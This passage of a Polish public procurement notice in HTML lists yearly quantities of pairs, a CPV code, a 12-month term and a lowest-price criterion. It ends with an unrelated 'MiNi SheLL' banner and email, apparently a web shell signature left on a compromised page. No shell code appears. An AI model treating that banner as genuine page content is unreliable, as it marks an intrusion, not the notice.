             - ilość na rok wg prawa opcji-zwiększenie 3600

8 para	- gwaramntowana ilość par na 1 rok 5400  
             - ilość na rok wg prawa opcji-zwiększenie 6480.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com